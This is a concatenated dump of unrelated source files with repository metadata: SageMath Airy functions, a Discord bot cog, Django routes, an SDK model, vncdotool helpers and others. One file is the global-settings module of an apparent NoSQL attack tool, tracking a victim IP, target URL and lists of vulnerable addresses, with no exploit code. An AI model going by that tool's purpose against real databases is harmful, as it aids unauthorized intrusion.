BuiltinFunction.__init__(self, "airy_bi", nargs=2,
latex_name=r"\operatorname{Bi}")
def _derivative_(self, alpha, x, diff_param=None):
"""
EXAMPLES::
sage: from sage.functions.airy import airy_bi_general
sage: x, n = var('x n')
sage: derivative(airy_bi_general(n, x), x)
airy_bi(n + 1, x)
sage: derivative(airy_bi_general(n, x), n)
Traceback (most recent call last):
...
NotImplementedError: cannot differentiate airy_bi in the first parameter
"""
if diff_param == 0:
raise NotImplementedError("cannot differentiate airy_bi in the"
" first parameter")
return airy_bi_general(alpha + 1, x)
def _eval_(self, alpha, x):
"""
EXAMPLES::
sage: from sage.functions.airy import airy_bi_general
sage: x, n = var('x n')
sage: airy_bi_general(-2, 1.0)
0.388621540699059
sage: airy_bi_general(n, 1.0)
airy_bi(n, 1.00000000000000)
"""
if not isinstance(x, Expression) and \
not isinstance(alpha, Expression):
if alpha == 0:
return airy_bi_simple(x)
if alpha == 1:
return airy_bi_prime(x)
if alpha == 2:
return x*airy_bi_simple(x)
def _evalf_(self, alpha, x, **kwargs):
"""
EXAMPLES::
sage: from sage.functions.airy import airy_bi_general
sage: airy_bi_general(-2, 1.0)
0.388621540699059
"""
parent = kwargs.get('parent')
import mpmath
from sage.libs.mpmath import utils as mpmath_utils
return mpmath_utils.call(mpmath.airybi, x, derivative=alpha,
parent=parent)
class FunctionAiryBiSimple(BuiltinFunction):
def __init__(self):
"""
The class for the Airy Bi function.
EXAMPLES::
sage: from sage.functions.airy import airy_bi_simple
sage: f = airy_bi_simple(x); f
airy_bi(x)
"""
BuiltinFunction.__init__(self, "airy_bi",
latex_name=r'\operatorname{Bi}',
conversions=dict(mathematica='AiryBi',
maxima='airy_bi'))
def _derivative_(self, x, diff_param=None):
"""
EXAMPLES::
sage: from sage.functions.airy import airy_bi_simple
sage: derivative(airy_bi_simple(x), x)
airy_bi_prime(x)
"""
return airy_bi_prime(x)
def _eval_(self, x):
"""
EXAMPLES::
sage: from sage.functions.airy import airy_bi_simple
sage: airy_bi_simple(0)
1/3*3^(5/6)/gamma(2/3)
sage: airy_bi_simple(0.0)
0.614926627446001
sage: airy_bi_simple(0).n() == airy_bi(0.0)
True
sage: airy_bi_simple(I)
airy_bi(I)
sage: airy_bi_simple(1.0 * I)
0.648858208330395 + 0.344958634768048*I
"""
if x == 0:
one_sixth = ZZ(1) / 6
return 1 / (3 ** (one_sixth) * gamma(4 * one_sixth))
def _evalf_(self, x, **kwargs):
"""
EXAMPLES::
sage: from sage.functions.airy import airy_bi_simple
sage: airy_bi_simple(0.0)
0.614926627446001
sage: airy_bi_simple(1.0 * I)
0.648858208330395 + 0.344958634768048*I
We can use several methods for numerical evaluation::
sage: airy_bi_simple(3).n(algorithm='mpmath')
14.0373289637302
sage: airy_bi_simple(3).n(algorithm='mpmath', prec=100)
14.037328963730232031740267314
sage: airy_bi_simple(3).n(algorithm='scipy') # rel tol 1e-10
14.037328963730136
sage: airy_bi_simple(I).n(algorithm='scipy') # rel tol 1e-10
0.648858208330395 + 0.34495863476804844*I
TESTS::
sage: parent(airy_bi_simple(3).n(algorithm='scipy'))
Real Field with 53 bits of precision
sage: airy_bi_simple(3).n(algorithm='scipy', prec=200)
Traceback (most recent call last):
...
NotImplementedError: airy_bi not implemented for precision > 53
"""
algorithm = kwargs.get('algorithm', 'mpmath') or 'mpmath'
parent = kwargs.get('parent', None)
if algorithm == 'scipy':
if hasattr(parent, 'prec') and parent.prec() > 53:
raise NotImplementedError("%s not implemented for precision > 53"%self.name())
from sage.rings.all import RR, CC
from sage.functions.other import real,imag
from scipy.special import airy as airy
if x in RR:
y = airy(real(x))[2]
if parent is None:
return RR(y)
else:
y = airy(complex(real(x),imag(x)))[2]
if parent is None:
return CC(y)
return parent(y)
elif algorithm == 'mpmath':
import mpmath
from sage.libs.mpmath import utils as mpmath_utils
return mpmath_utils.call(mpmath.airybi, x, parent=parent)
else:
raise ValueError("unknown algorithm '%s'" % algorithm)
class FunctionAiryBiPrime(BuiltinFunction):
def __init__(self):
"""
The derivative of the Airy Bi function; see :func:`airy_bi`
for the full documentation.
EXAMPLES::
sage: x, n = var('x n')
sage: airy_bi_prime(x)
airy_bi_prime(x)
sage: airy_bi_prime(0)
3^(1/6)/gamma(1/3)
"""
BuiltinFunction.__init__(self, "airy_bi_prime",
latex_name=r"\operatorname{Bi}'",
conversions=dict(mathematica='AiryBiPrime',
maxima='airy_dbi'))
def _derivative_(self, x, diff_param=None):
"""
EXAMPLES::
sage: derivative(airy_bi_prime(x), x)
x*airy_bi(x)
"""
return x * airy_bi_simple(x)
def _eval_(self, x):
"""
EXAMPLES::
sage: airy_bi_prime(0)
3^(1/6)/gamma(1/3)
sage: airy_bi_prime(0.0)
0.448288357353826
"""
if x == 0:
one_sixth = ZZ(1) / 6
return 3 ** (one_sixth) / gamma(2 * one_sixth)
def _evalf_(self, x, **kwargs):
"""
EXAMPLES::
sage: airy_bi_prime(0.0)
0.448288357353826
We can use several methods for numerical evaluation::
sage: airy_bi_prime(4).n(algorithm='mpmath')
161.926683504613
sage: airy_bi_prime(4).n(algorithm='mpmath', prec=100)
161.92668350461340184309492429
sage: airy_bi_prime(4).n(algorithm='scipy') # rel tol 1e-10
161.92668350461398
sage: airy_bi_prime(I).n(algorithm='scipy') # rel tol 1e-10
0.135026646710819 - 0.1288373867812549*I
TESTS::
sage: parent(airy_bi_prime(3).n(algorithm='scipy'))
Real Field with 53 bits of precision
sage: airy_bi_prime(3).n(algorithm='scipy', prec=200)
Traceback (most recent call last):
...
NotImplementedError: airy_bi_prime not implemented for precision > 53
"""
algorithm = kwargs.get('algorithm', 'mpmath') or 'mpmath'
parent = kwargs.get('parent', None)
if algorithm == 'scipy':
if hasattr(parent, 'prec') and parent.prec() > 53:
raise NotImplementedError("%s not implemented for precision > 53"%self.name())
from sage.rings.all import RR, CC
from sage.functions.other import real,imag
from scipy.special import airy as airy
if x in RR:
y = airy(real(x))[3]
if parent is None:
return RR(y)
else:
y = airy(complex(real(x),imag(x)))[3]
if parent is None:
return CC(y)
return parent(y)
elif algorithm == 'mpmath':
import mpmath
from sage.libs.mpmath import utils as mpmath_utils
return mpmath_utils.call(mpmath.airybi, x, derivative=1,
parent=parent)
else:
raise ValueError("unknown algorithm '%s'" % algorithm)
airy_bi_general = FunctionAiryBiGeneral()
airy_bi_simple = FunctionAiryBiSimple()
airy_bi_prime = FunctionAiryBiPrime()
def airy_bi(alpha, x=None, hold_derivative=True, **kwds):
r"""
The Airy Bi function
The Airy Bi function `\operatorname{Bi}(x)` is (along with
`\operatorname{Ai}(x)`) one of the two linearly independent standard
solutions to the Airy differential equation `f''(x) - x f(x) = 0`. It is
defined by the initial conditions:
.. math ::
\operatorname{Bi}(0)=\frac{1}{3^{1/6} \Gamma\left(\frac{2}{3}\right)},
\operatorname{Bi}'(0)=\frac{3^{1/6}}{ \Gamma\left(\frac{1}{3}\right)}.
Another way to define the Airy Bi function is:
.. math::
\operatorname{Bi}(x)=\frac{1}{\pi}\int_0^\infty
\left[ \exp\left( xt -\frac{t^3}{3} \right)
+\sin\left(xt + \frac{1}{3}t^3\right) \right ] dt.
INPUT:
- ``alpha`` -- Return the `\alpha`-th order fractional derivative with
respect to `z`.
For `\alpha = n = 1,2,3,\ldots` this gives the derivative
`\operatorname{Bi}^{(n)}(z)`, and for `\alpha = -n = -1,-2,-3,\ldots`
this gives the `n`-fold iterated integral.
.. math ::
f_0(z) = \operatorname{Bi}(z)
f_n(z) = \int_0^z f_{n-1}(t) dt
- ``x`` -- The argument of the function
- ``hold_derivative`` -- Whether or not to stop from returning higher
derivatives in terms of `\operatorname{Bi}(x)` and
`\operatorname{Bi}'(x)`
.. SEEALSO:: :func:`airy_ai`
EXAMPLES::
sage: n, x = var('n x')
sage: airy_bi(x)
airy_bi(x)
It can return derivatives or integrals::
sage: airy_bi(2, x)
airy_bi(2, x)
sage: airy_bi(1, x, hold_derivative=False)
airy_bi_prime(x)
sage: airy_bi(2, x, hold_derivative=False)
x*airy_bi(x)
sage: airy_bi(-2, x, hold_derivative=False)
airy_bi(-2, x)
sage: airy_bi(n, x)
airy_bi(n, x)
It can be evaluated symbolically or numerically for real or complex
values::
sage: airy_bi(0)
1/3*3^(5/6)/gamma(2/3)
sage: airy_bi(0.0)
0.614926627446001
sage: airy_bi(I)
airy_bi(I)
sage: airy_bi(1.0*I)
0.648858208330395 + 0.344958634768048*I
The functions can be evaluated numerically using mpmath,
which can compute the values to arbitrary precision, and scipy::
sage: airy_bi(2).n(prec=100)
3.2980949999782147102806044252
sage: airy_bi(2).n(algorithm='mpmath', prec=100)
3.2980949999782147102806044252
sage: airy_bi(2).n(algorithm='scipy') # rel tol 1e-10
3.2980949999782134
And the derivatives can be evaluated::
sage: airy_bi(1, 0)
3^(1/6)/gamma(1/3)
sage: airy_bi(1, 0.0)
0.448288357353826
Plots::
sage: plot(airy_bi(x), (x, -10, 5)) + plot(airy_bi_prime(x),
....: (x, -10, 5), color='red')
Graphics object consisting of 2 graphics primitives
**References**
- Abramowitz, Milton; Stegun, Irene A., eds. (1965), "Chapter 10"
- :wikipedia:`Airy_function`
"""
# We catch the case with no alpha
if x is None:
x = alpha
return airy_bi_simple(x, **kwds)
# We take care of all other cases.
if not alpha in ZZ and not isinstance(alpha, Expression):
return airy_bi_general(alpha, x, **kwds)
if hold_derivative:
return airy_bi_general(alpha, x, **kwds)
elif alpha == 0:
return airy_bi_simple(x, **kwds)
elif alpha == 1:
return airy_bi_prime(x, **kwds)
elif alpha > 1:
# We use a different variable here because if x is a
# particular value, we would be differentiating a constant
# which would return 0. What we want is the value of
# the derivative at the value and not the derivative of
# a particular value of the function.
v = SR.symbol()
return derivative(airy_bi_simple(v, **kwds), v, alpha).subs({v: x})
else:
return airy_bi_general(alpha, x, **kwds)
| 33.57461 | 106 | 0.548524 |
8f745849e52fa61740852128171f2de7c13525f0 | 2,953 | py | Python | cogs/lyrics.py | ssebastianoo/SpotifyLyrics | 489c5e9f3b76f40a497ea82e85ebbb178f2a774b | [
"MIT"
] | 2 | 2021-07-24T18:15:05.000Z | 2021-11-14T11:29:04.000Z | cogs/lyrics.py | ssebastianoo/SpotifyLyrics | 489c5e9f3b76f40a497ea82e85ebbb178f2a774b | [
"MIT"
] | null | null | null | cogs/lyrics.py | ssebastianoo/SpotifyLyrics | 489c5e9f3b76f40a497ea82e85ebbb178f2a774b | [
"MIT"
] | null | null | null | import discord
from urllib.parse import quote
from discord.ext import commands
from discord_slash import cog_ext, SlashContext
from discord_slash.utils.manage_commands import create_option
class Lyrics(commands.Cog):
def __init__(self, bot):
self.bot = bot
@cog_ext.cog_slash(name="lyrics", description="Get the lyrics of a song a member is listening to", options=[create_option(
name="member",
description="The member you want to get info about",
option_type=6,
required=False,
)])
async def settings_slash(self, ctx: SlashContext, member=None):
if not member:
member = ctx.guild.get_member(ctx.author.id)
await self.lyrics(ctx, member)
@commands.command()
async def lyrics(self, ctx, member: discord.Member=None):
member = member or ctx.author
activities = [activity for activity in member.activities if activity.type == discord.ActivityType.listening]
if len(activities) == 0:
emb = discord.Embed(description=f"{member.mention} isn't listening to Spotify at the moment.", colour=discord.Colour.red())
try: await ctx.reply(embed=emb, mention_author=False)
except: await ctx.send(embed=emb)
return
activity = activities[0]
title = activity.title
artists = activity.artist
query = quote(title + " " + artists)
emb = discord.Embed(description="Searching lyrics...", colour=activity.colour)
try: msg = await ctx.reply(embed=emb, mention_author=False)
except: msg = await ctx.send(embed=emb)
res = await self.bot.session.get(f"https://some-random-api.ml/lyrics?title={query}")
data = await res.json()
if data.get("error"):
emb = discord.Embed(description=data.get("error"), colour=discord.Colour.red())
return await msg.edit(embed=emb)
paginator = commands.Paginator(prefix=None, suffix=None, max_size=4096)
for line in data["lyrics"].splitlines():
paginator.add_line(line)
emb = discord.Embed(title=f"{data['author']} | {data['title']}", description=paginator.pages[0], colour=activity.colour)
emb.set_author(name=str(member), icon_url=str(member.avatar_url_as(static_format="png")))
emb.set_thumbnail(url=activity.album_cover_url)
if len(paginator.pages) > 1:
emb.set_footer(text=f"Pag. 1/{len(paginator.pages)}")
await msg.edit(embed=emb)
emb = discord.Embed(colour=activity.colour)
count = 0
for pag in paginator.pages:
if count == 0:
pass
else:
emb.description = pag
emb.set_footer(text=f"Pag. {count + 1}/{len(paginator.pages)}")
msg = await msg.reply(embed=emb, mention_author=False)
count += 1
def setup(bot):
bot.add_cog(Lyrics(bot))
| 37.858974 | 135 | 0.631561 |
13c78543efaa5ffd0f66b231a8493e977a6eafa6 | 152 | py | Python | src/modules/helper/formatters.py | spotlightpa/covid-alerts-emailer | 6362b841aa348d33096489495a9d4a2a4925cff7 | [
"MIT"
] | 1 | 2021-03-19T16:03:39.000Z | 2021-03-19T16:03:39.000Z | src/modules/helper/formatters.py | spotlightpa/covid-alerts-emailer | 6362b841aa348d33096489495a9d4a2a4925cff7 | [
"MIT"
] | null | null | null | src/modules/helper/formatters.py | spotlightpa/covid-alerts-emailer | 6362b841aa348d33096489495a9d4a2a4925cff7 | [
"MIT"
] | null | null | null | def format_commas(number: int):
"""
Takes int, adds commas between 1000s. eg. converts 10000 to 10,000
"""
return "{:,}".format(number)
| 25.333333 | 70 | 0.625 |
74109f55606dd7e4528a6816a2f9a41b90b018cd | 2,309 | py | Python | DPPinPytorch/positive bias.py | visinf/dpp | e810bd63ed61bd7710559467bcd9a35ab9a1b028 | [
"BSD-3-Clause"
] | 118 | 2018-04-12T02:41:43.000Z | 2022-03-09T12:49:58.000Z | DPPinPytorch/positive bias.py | visinf/dpp | e810bd63ed61bd7710559467bcd9a35ab9a1b028 | [
"BSD-3-Clause"
] | 11 | 2018-05-09T11:51:21.000Z | 2020-09-02T10:19:14.000Z | DPPinPytorch/positive bias.py | visinf/dpp | e810bd63ed61bd7710559467bcd9a35ab9a1b028 | [
"BSD-3-Clause"
] | 22 | 2018-04-12T16:16:04.000Z | 2020-07-15T03:20:29.000Z | # Copyright (c) 2018, TU Darmstadt.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
# import tc and torch both
import tensor_comprehensions as tc
import torch
import torch.nn as nn
from torch.utils.serialization import load_lua
# define the operation as TC language
lang = """
def PositivePowBias(float(B, C, W, H) I0, float(C) Alpha, float(C) Lambda) -> (O) {
O(b, c, w, h) = pow(I0(b, c, w, h),exp(Lambda(c)))
O(b, c, w, h) = O(b, c, w, h) + exp(Alpha(c))
}
def PositivePowBias_grad(float(B, C, W, H) I0, float(C) Alpha, float(C) Lambda, float(B,C,W,H) d_O) -> (d_I0, d_Lambda, d_Alpha){
d_I0(b,c,w,h) = pow(I0(b,c,w,h), exp(Lambda(c))-1) * exp(Lambda(c))
d_Lambda(c) +=! pow(I0(b,c,w,h),exp(Lambda(c))) * log(I0(b,c,w,h))*exp(Lambda(c))
d_Alpha (c) = B*W*H*exp(Alpha(c))
}
"""
# register the lang with TC backend
PositivePowBias = tc.define(lang, training=True, name="PositivePowBias", backward="PositivePowBias_grad")
# create input cuda tensors
B,C,W,H = 32, 512, 32, 32
I0, Alpha, Lambda = torch.randn(B, C, W, H).cuda(), torch.randn(C).cuda(),torch.randn(C).cuda()
# choose the options that resemble the operation and run
#out = tensordot(I0, I1, options=tc.Options("conv"))
# autotune the kernel
best_options = PositivePowBias.autotune(I0, Alpha, Lambda, cache="PositivePowBias_32_512_32_32.tc",generations=2)
# run the kernel with the autotuned options
#out = PositivePowBias(I0, Alpha, Lambda, options=best_options)
class pospowbias(nn.Module):
def __init__(self):
super(pospowbias, self).__init__()
self.Lambda = nn.Parameter(torch.zeros(1))
self.Alpha = nn.Parameter(torch.zeros(1))
def forward(self, x):
return PositivePowBias(x, self.Alpha, self.Lambda, options=best_options)
class DPP(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.pospowbias=pospowbias()
def forward(self, I):
It = F.upsample(F.avg_pool2d(I, 2), scale_factor=2, mode='nearest')
x = ((I-It)**2)+1e-3
xn = F.upsample(F.avg_pool2d(x, 2), scale_factor=2, mode='nearest')
w = pospowbias(x/xn)
kp = F.avg_pool2d(w, 2)
Iw = F.avg_pool2d(I*w, 2)
return Iw/kp
| 38.483333 | 129 | 0.661758 |
334e220fa4fc0b1d730eb14026f00e3b8f3a01ac | 1,369 | py | Python | geocamUtil/plane.py | finleyexp/georef_geocamutilweb | 3ea2d2cf65928cba6ad6fb0a8b601e19d2cb17f6 | [
"NASA-1.3"
] | null | null | null | geocamUtil/plane.py | finleyexp/georef_geocamutilweb | 3ea2d2cf65928cba6ad6fb0a8b601e19d2cb17f6 | [
"NASA-1.3"
] | null | null | null | geocamUtil/plane.py | finleyexp/georef_geocamutilweb | 3ea2d2cf65928cba6ad6fb0a8b601e19d2cb17f6 | [
"NASA-1.3"
] | 4 | 2017-07-16T03:21:09.000Z | 2019-11-12T20:29:36.000Z | # Based on https://github.com/phire/Python-Ray-tracer/blob/master/plane.py
# https://gist.github.com/rossant/6046463
"""A ray-traceable Plane is a Plane through a given
point with a given normal and surface material.
It needs an intersect method that returns the
point of intersection of a given ray with the
plane and a normal method that returns the normal
at a given point (which is irrelevant for a plane
as the normal is the same everywhere)."""
from geom3 import Vector3, Point3, Ray3, dot, unit
from math import sqrt
from hit import Hit
class Plane(object):
"""A ray-traceable plane"""
def __init__(self, point, normal):
"""Create a plane through a given point with given normal"""
self.point = point
self.norm = unit(normal)
def intersect(self, ray):
# Return the distance from O to the intersection of the ray (O, D) with the
# plane (P, N), or +inf if there is no intersection.
# O and P are 3D points, D and N (normal) are normalized vectors.
O = ray.start
D = ray.dir
P = self.point # some point on the plane
N = self.norm # normal vector to the plane
denom = np.dot(D, N)
if np.abs(denom) < 1e-6:
return np.inf
d = np.dot(P - O, N) / denom
if d < 0:
return np.inf
return d | 36.026316 | 84 | 0.6355 |
a246d4b95469792f1d2cfe0a1633d051e4312b91 | 100 | py | Python | src/product/apps.py | asanka94/OMS-backend | 0b0637b40e71b9b71156d28fdc0ff1fb7a3d12ac | [
"MIT"
] | null | null | null | src/product/apps.py | asanka94/OMS-backend | 0b0637b40e71b9b71156d28fdc0ff1fb7a3d12ac | [
"MIT"
] | 9 | 2021-03-19T01:50:04.000Z | 2022-03-12T00:23:18.000Z | src/product/apps.py | asanka94/OMS-backend | 0b0637b40e71b9b71156d28fdc0ff1fb7a3d12ac | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class CatalogueConfig(AppConfig):
name = 'src.product'
| 16.666667 | 34 | 0.72 |
a4620f042ba0825ffed3e8c8cbaf32acd2f87149 | 1,143 | py | Python | project/app/urls.py | dbinetti/kidsallin | 147491cdfbe812ffde91725193ec16c03083c1da | [
"BSD-3-Clause"
] | null | null | null | project/app/urls.py | dbinetti/kidsallin | 147491cdfbe812ffde91725193ec16c03083c1da | [
"BSD-3-Clause"
] | null | null | null | project/app/urls.py | dbinetti/kidsallin | 147491cdfbe812ffde91725193ec16c03083c1da | [
"BSD-3-Clause"
] | null | null | null | # Django
from django.urls import path
from django.views.generic import TemplateView
# Local
from . import views
urlpatterns = [
# Root
path('', views.index, name='index',),
# Footer
path('about/', TemplateView.as_view(template_name='app/pages/about.html'), name='about',),
path('faq/', TemplateView.as_view(template_name='app/pages/faq.html'), name='faq',),
path('privacy/', TemplateView.as_view(template_name='app/pages/privacy.html'), name='privacy',),
path('terms/', TemplateView.as_view(template_name='app/pages/terms.html'), name='terms',),
path('support/', TemplateView.as_view(template_name='app/pages/support.html'), name='support',),
# Authentication
path('join', views.join, name='join'),
path('callback', views.callback, name='callback'),
path('login', views.login, name='login'),
path('logout', views.logout, name='logout'),
# Account
path('account', views.account, name='account',),
# Delete
path('delete', views.delete, name='delete',),
# EMail
path('inbound', views.inbound, name='inbound',),
path('wistia', views.wistia, name='wistia',),
]
| 32.657143 | 100 | 0.663167 |
096765c66bcded8e910b616b1bb7f680a0d9496f | 2,017 | py | Python | NoSQLAttack/globalVar.py | Marzooq13579/Hack-Gadgets | 4b9351c4465f3e01fb0390b1e86dfe7c26237a19 | [
"MIT"
] | 8 | 2019-02-17T20:11:46.000Z | 2019-10-18T06:27:16.000Z | NoSQLAttack/globalVar.py | Marzooq13579/Hack-Gadgets | 4b9351c4465f3e01fb0390b1e86dfe7c26237a19 | [
"MIT"
] | null | null | null | NoSQLAttack/globalVar.py | Marzooq13579/Hack-Gadgets | 4b9351c4465f3e01fb0390b1e86dfe7c26237a19 | [
"MIT"
] | 4 | 2019-02-17T23:00:18.000Z | 2019-10-18T06:27:14.000Z | class GlobalVar:
optionSet = [False] * 9
yes_tag = ['y', 'Y'] # easy for users to choose "y" or "Y"
no_tag = ['n', 'N']
victim = "Not Set" # target IP
webPort = 80
url = "Not Set"
httpMethod= "Not Set"
platform = "Not Set"
https = "Not Set" # use http or https for attacking URL
myIP = "Not Set" # local IP
myPort = "Not Set" # local port
verb = "Not Set" # verbose mode mean user can get more detail info while attacking
scanNeedCreds = "Not Set"
dbPort = 27017
vulnAddrs = []
possAddrs = []
def set_vulnAddrs(value):
GlobalVar.vulnAddrs.append(value)
def get_vulnAddrs():
return GlobalVar.vulnAddrs
def set_possAddrs(value):
GlobalVar.possAddrs.append(value)
def get_possAddrs():
return GlobalVar.possAddrs
def set_optionSet(i,value):
GlobalVar.optionSet[i]=value
def get_optionSet(i):
return GlobalVar.optionSet[i]
def get_yes_tag():
return GlobalVar.yes_tag
def get_no_tag():
return GlobalVar.no_tag
def set_victim(value):
GlobalVar.victim = value
def get_victim():
return GlobalVar.victim
def set_webPort(value):
GlobalVar.webPort = value
def get_webPort():
return GlobalVar.webPort
def set_url(value):
GlobalVar.url = value
def get_url():
return GlobalVar.url;
def set_httpMethod(value):
GlobalVar.httpMethod = value
def get_httpMethod():
return GlobalVar.httpMethod
def set_platform(value):
GlobalVar.platform = value
def get_platform():
return GlobalVar.platform
def set_myIP(value):
GlobalVar.myIP = value
def get_myIP():
return GlobalVar.myIP
def set_myPort(value):
GlobalVar.myPort = value
def get_myPort():
return GlobalVar.myPort
def set_dbPort(value):
GlobalVar.dbPort = value
def get_dbPort():
return GlobalVar.dbPort
def set_https(value):
GlobalVar.https = value
def get_https():
return GlobalVar.https;
def set_verb(value):
GlobalVar.verb = value
def get_verb():
return GlobalVar.verb
scanNeedCreds = "not set" | 22.920455 | 86 | 0.6941 |
5afe39edf37c3d89a94a1a9314b3b787dcd6a764 | 963 | py | Python | capsules/classifier_person_attributes_openvino/capsule.py | aotuai/capsule-zoo | bb0093799cf035a88153a9be6ed1e58df9923a8e | [
"BSD-3-Clause"
] | 11 | 2021-02-08T03:23:17.000Z | 2022-03-15T08:31:59.000Z | capsules/classifier_person_attributes_openvino/capsule.py | aotuai/capsule-zoo | bb0093799cf035a88153a9be6ed1e58df9923a8e | [
"BSD-3-Clause"
] | 5 | 2020-12-31T20:43:18.000Z | 2021-03-24T02:26:41.000Z | capsules/classifier_person_attributes_openvino/capsule.py | aotuai/capsule-zoo | bb0093799cf035a88153a9be6ed1e58df9923a8e | [
"BSD-3-Clause"
] | 6 | 2021-01-25T10:59:37.000Z | 2022-02-26T07:36:43.000Z | from vcap import BaseCapsule, DeviceMapper, NodeDescription
from .backend import ATTRIBUTES, Backend, options
class Capsule(BaseCapsule):
name = "classifier_person_attributes_openvino"
description = "OpenVINO powered person classifier, " \
"for general person appearance attributes."
version = 1
device_mapper = DeviceMapper.map_to_openvino_devices()
input_type = NodeDescription(
size=NodeDescription.Size.SINGLE,
detections=["person"])
output_type = NodeDescription(
size=NodeDescription.Size.SINGLE,
detections=["person"],
attributes=ATTRIBUTES,
)
backend_loader = lambda capsule_files, device: Backend(
model_xml=capsule_files[
"person-attributes-recognition-crossroad-0230-fp16.xml"],
weights_bin=capsule_files[
"person-attributes-recognition-crossroad-0230-fp16.bin"],
device_name=device
)
options = options
| 34.392857 | 69 | 0.694704 |
0941925ca50893b1f5e0c08e7b0c319c1cc68a1e | 3,103 | py | Python | isi_sdk_8_1_0/isi_sdk_8_1_0/models/reports_threats.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 24 | 2018-06-22T14:13:23.000Z | 2022-03-23T01:21:26.000Z | isi_sdk_8_1_0/isi_sdk_8_1_0/models/reports_threats.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 46 | 2018-04-30T13:28:22.000Z | 2022-03-21T21:11:07.000Z | isi_sdk_8_1_0/isi_sdk_8_1_0/models/reports_threats.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 29 | 2018-06-19T00:14:04.000Z | 2022-02-08T17:51:19.000Z | # coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 5
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from isi_sdk_8_1_0.models.reports_threats_report import ReportsThreatsReport # noqa: F401,E501
class ReportsThreats(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'reports': 'list[ReportsThreatsReport]'
}
attribute_map = {
'reports': 'reports'
}
def __init__(self, reports=None): # noqa: E501
"""ReportsThreats - a model defined in Swagger""" # noqa: E501
self._reports = None
self.discriminator = None
if reports is not None:
self.reports = reports
@property
def reports(self):
"""Gets the reports of this ReportsThreats. # noqa: E501
:return: The reports of this ReportsThreats. # noqa: E501
:rtype: list[ReportsThreatsReport]
"""
return self._reports
@reports.setter
def reports(self, reports):
"""Sets the reports of this ReportsThreats.
:param reports: The reports of this ReportsThreats. # noqa: E501
:type: list[ReportsThreatsReport]
"""
self._reports = reports
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ReportsThreats):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 26.982609 | 95 | 0.571383 |
2475cf39b97c1c7be54865dcb1346f671b0792a6 | 3,359 | py | Python | vncdotool/api.py | easybe/vncdotool | 2ed9d4fa69b596c5ee848bc6d48c875dfe1d7282 | [
"MIT"
] | 2 | 2015-11-10T15:02:29.000Z | 2021-09-14T23:34:22.000Z | vncdotool/api.py | easybe/vncdotool | 2ed9d4fa69b596c5ee848bc6d48c875dfe1d7282 | [
"MIT"
] | null | null | null | vncdotool/api.py | easybe/vncdotool | 2ed9d4fa69b596c5ee848bc6d48c875dfe1d7282 | [
"MIT"
] | 1 | 2021-09-14T23:34:28.000Z | 2021-09-14T23:34:28.000Z | """ Helpers to allow vncdotool to be intergrated into other applications.
This feature is under developemental, you're help testing and
debugging is appreciated.
"""
import threading
import Queue
import logging
from twisted.internet import reactor
from twisted.internet.defer import maybeDeferred
from twisted.python.log import PythonLoggingObserver
from twisted.python.failure import Failure
from vncdotool import command
from vncdotool.client import VNCDoToolFactory, VNCDoToolClient
__all__ = ['connect']
log = logging.getLogger('vncdotool.api')
_THREAD = None
class VNCDoException(Exception):
pass
def connect(server, password=None):
""" Connect to a VNCServer and return a Client instance that is usable
in the main thread of non-Twisted Python Applications, EXPERIMENTAL.
>>> from vncdotool import api
>>> client = api.connect('host')
>>> client.keyPress('c')
>>> api.shutdown()
You may then call any regular VNCDoToolClient method on client from your
application code.
If you are using a GUI toolkit or other major async library please read
http://twistedmatrix.com/documents/13.0.0/core/howto/choosing-reactor.html
for a better method of intergrating vncdotool.
"""
if not reactor.running:
global _THREAD
_THREAD = threading.Thread(target=reactor.run, name='Twisted',
kwargs={'installSignalHandlers': False})
_THREAD.daemon = True
_THREAD.start()
observer = PythonLoggingObserver()
observer.start()
factory = VNCDoToolFactory()
if password is not None:
factory.password = password
client = ThreadedVNCClientProxy(factory)
host, port = command.parse_host(server)
client.connect(host, port)
return client
def shutdown():
if not reactor.running:
return
reactor.callFromThread(reactor.stop)
_THREAD.join()
class ThreadedVNCClientProxy(object):
def __init__(self, factory):
self.factory = factory
self.queue = Queue.Queue()
def connect(self, host, port=5900):
reactor.callWhenRunning(reactor.connectTCP, host, port, self.factory)
def __getattr__(self, attr):
method = getattr(VNCDoToolClient, attr)
def errback(reason, *args, **kwargs):
self.queue.put(Failure(reason))
def callback(protocol, *args, **kwargs):
def result_callback(result):
self.queue.put(result)
return result
d = maybeDeferred(method, protocol, *args, **kwargs)
d.addBoth(result_callback)
return d
def proxy_call(*args, **kwargs):
reactor.callFromThread(self.factory.deferred.addCallbacks,
callback, errback, args, kwargs)
result = self.queue.get(timeout=60 * 60)
if isinstance(result, Failure):
raise VNCDoException(result)
return result
return proxy_call
if __name__ == '__main__':
import sys
logging.basicConfig(level=logging.DEBUG)
server = sys.argv[1]
client1 = connect(server)
client2 = connect(server)
client1.captureScreen('screenshot.png')
for key in 'username':
client2.keyPress(key)
for key in 'passw0rd':
client1.keyPress(key)
shutdown()
| 26.242188 | 78 | 0.664781 |
